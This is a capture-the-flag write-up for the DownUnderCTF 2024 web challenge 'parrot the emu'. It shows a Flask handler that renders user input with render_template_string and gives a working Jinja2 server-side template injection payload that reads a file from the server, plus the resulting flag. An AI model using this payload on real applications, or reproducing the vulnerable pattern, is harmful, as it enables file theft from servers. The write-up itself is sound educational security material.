MQCyberSec

MQCyberSec Logo

MQCyberSec
Back to Writeups

parrot the emu

by sealldev
🚩 CTFs DownUnderCTF 2024 web
Suggested: #ssti
parrot the emu / DownUnderCTF 2024
parrot the emu

Description

It is so nice to hear Parrot the Emu talk back

Original Writeup on seall.dev

We are given web source and an instance. The website reflects what you type:

parrottheemu

Looking in the source code is something of interest:

...
    if request.method == 'POST':
        user_input = request.form.get('user_input')
        try:
            result = render_template_string(user_input)
        except Exception as e:
            result = str(e)
...

render_template_string is generally dangerous with unvalidated user input as it’s vulnerable to SSTI, as this is Python, Jinja2 SSTI is quite a good start.

I first tried the payload {%raw%}{{7*7}}{%endraw%} and the parrot responds with 49, perfect!

Now we need to try to read the flag file, I try various payloads but find this one works: {%raw%}{{ get_flashed_messages.__globals__.__builtins__.open("./flag").read() }}{%endraw%}.

parrottheemusolve

Flag: DUCTF{PaRrOt_EmU_ReNdErS_AnYtHiNg}

Related Writeups

Insp3ct0r

Kishor Balan tipped us off that the following code may need inspection: https://jupiter.challenges.picoctf.org/problem/4 ...

#easy

caas

Now presenting cowsay as a service https://caas.mars.picoctf.net/

#medium

Cookies

Who doesn't love cookies? Try to figure out the best one. http://mercury.picoctf.net:17781/

#easy

Share this writeup

Contribute

Found an issue or want to improve this writeup?

Edit on GitHub